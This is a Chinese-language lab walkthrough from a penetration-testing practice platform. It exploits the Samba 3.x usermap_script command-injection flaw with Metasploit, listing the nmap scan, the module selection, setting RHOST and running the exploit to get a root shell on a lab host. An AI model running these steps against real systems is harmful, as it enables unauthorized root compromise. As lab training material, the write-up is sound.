samba 3.x提权漏洞

声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。

[实验目的]

   1) 利用Samba漏洞,获得目标主机root权限

[实验原理]

   1) Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh.如果再调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了而已输入的话,就可能允许攻击者以nobody用户的权限执行任意命令.Samba服务端口:139\445.

[实验环境]

samba 3.x提权漏洞

[实验步骤]

一、利用nmap工具扫描目标主机

1.1 在终端中输入哪令"nmap -sV 192.168.1.3”, 对目标主机进行端口扫描,发现开放445端口、139端口并且安装samba软件。版本为3.x(注意此攻击也就适用于攻击3版本)
 

samba 3.x提权漏洞

1.2 在终端中输入命令"msfconsole" , 启动MSF终端。

samba 3.x提权漏洞

1.3 在终端中输入命令"search samba”, 搜索samba的相关I具和攻击载荷。

samba 3.x提权漏洞

samba 3.x提权漏洞

1.4 在终端中输入命令"use exploit/multi/samba/usermap_script" , 启用漏洞利用模块,提示符就会提示进入到该路径下。

samba 3.x提权漏洞

1.5 在终端中输入命令"info” , 查看需要设置的相关项,"yes" 表示必须填写的参数。

#用命令show options看到更清楚

1.6 在终端中输入命令"set RHOST 192.168.1.3”, 设置目标主机的IP地址。

samba 3.x提权漏洞

1.7 在终端中输入"exploit" 开始向目标 主机攻击,攻击成功后 ,建立会话。

samba 3.x提权漏洞

1.8 在终端中输入,'whoami" ,查看获得的权限为root ,输入命令"ifconfig" ,查看系统的网络信息。

samba 3.x提权漏洞